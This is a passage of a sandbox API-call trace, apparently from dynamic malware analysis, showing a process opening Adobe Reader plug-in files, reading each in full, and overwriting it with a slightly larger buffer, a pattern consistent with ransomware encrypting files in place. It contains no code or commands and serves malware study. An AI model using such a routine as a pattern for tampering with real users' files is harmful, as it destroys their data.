lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.120] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5dbe63 [0081.121] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.121] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.121] ReleaseMutex (hMutex=0x168) returned 1 [0081.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.api", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.api", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.api", lpUsedDefaultChar=0x0) returned 10 [0081.121] ReadFile (in: hFile=0x1d8, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0081.392] ReadFile (in: hFile=0x1d8, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0081.411] ReadFile (in: hFile=0x1d8, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x2000, lpOverlapped=0x0) returned 1 [0081.430] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5d9e63 [0081.431] ReadFile (in: hFile=0x1d8, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x345f278*=0x2000, lpOverlapped=0x0) returned 1 [0081.450] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x5d9e63 [0081.452] WriteFile (in: hFile=0x1d8, lpBuffer=0x28b3948*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x28b3948*, lpNumberOfBytesWritten=0x345f28c*=0x2588, lpOverlapped=0x0) returned 1 [0081.453] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0081.453] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0081.453] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0081.454] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0x2000, lpOverlapped=0x0) returned 1 [0081.454] CloseHandle (hObject=0x1d8) returned 1 [0081.455] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.466] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.466] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.466] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.467] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.467] ReleaseMutex (hMutex=0x168) returned 1 [0081.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.CAT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.CAT", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.CAT", lpUsedDefaultChar=0x0) returned 9 [0081.467] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0081.507] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.508] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0081.508] CloseHandle (hObject=0x1e4) returned 1 [0081.509] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.511] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.511] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.511] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.511] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.511] ReleaseMutex (hMutex=0x168) returned 1 [0081.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.ITA", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.ITA", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.ITA", lpUsedDefaultChar=0x0) returned 9 [0081.512] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0081.553] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.553] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0081.553] CloseHandle (hObject=0x1e4) returned 1 [0081.553] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.554] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.554] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.554] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.554] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.555] ReleaseMutex (hMutex=0x168) returned 1 [0081.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.SVE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.SVE", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.SVE", lpUsedDefaultChar=0x0) returned 9 [0081.555] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0081.579] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.579] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0081.580] CloseHandle (hObject=0x1e4) returned 1 [0081.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.596] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.597] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2000 [0081.597] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.597] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.597] ReleaseMutex (hMutex=0x168) returned 1 [0081.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.FRA", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.FRA", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.FRA", lpUsedDefaultChar=0x0) returned 10 [0081.597] ReadFile (in: hFile=0x1d8, lpBuffer=0x2665868, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x345f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0081.609] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.609] WriteFile (in: hFile=0x1d8, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x345f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0081.610] CloseHandle (hObject=0x1d8) returned 1 [0081.611] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.611] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.611] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0081.612] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.612] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.612] ReleaseMutex (hMutex=0x168) returned 1 [0081.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.SUO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.SUO", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.SUO", lpUsedDefaultChar=0x0) returned 10 [0081.612] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea5988, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0081.624] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.625] WriteFile (in: hFile=0x1d8, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0081.625] CloseHandle (hObject=0x1d8) returned 1 [0081.626] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.626] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.627] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.627] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.627] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.627] ReleaseMutex (hMutex=0x168) returned 1 [0081.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.EUQ", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.EUQ", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.EUQ", lpUsedDefaultChar=0x0) returned 13 [0081.627] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0081.640] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.640] WriteFile (in: hFile=0x1d8, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0081.640] CloseHandle (hObject=0x1d8) returned 1 [0081.640] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.641] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.641] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.641] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.642] ReleaseMutex (hMutex=0x168) returned 1 [0081.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.PTB", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.PTB", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.PTB", lpUsedDefaultChar=0x0) returned 13 [0081.642] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0081.652] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.652] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0081.652] CloseHandle (hObject=0x1d8) returned 1 [0081.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0081.660] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.660] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.660] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.660] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.661] ReleaseMutex (hMutex=0x168) returned 1 [0081.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.ESP", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.ESP", cchWideChar=16, lpMultiByteStr=0x1f88c44, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.ESP", lpUsedDefaultChar=0x0) returned 16 [0081.661] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0081.668] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.668] WriteFile (in: hFile=0x1e4, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0081.669] CloseHandle (hObject=0x1e4) returned 1 [0081.669] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.685] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.685] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa00 [0081.685] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.685] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.685] ReleaseMutex (hMutex=0x168) returned 1 [0081.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.NOR", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0081.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.NOR", cchWideChar=16, lpMultiByteStr=0x1f8867c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.NOR", lpUsedDefaultChar=0x0) returned 16 [0081.686] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x345f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0081.693] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.694] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f2d0*=0xf88, 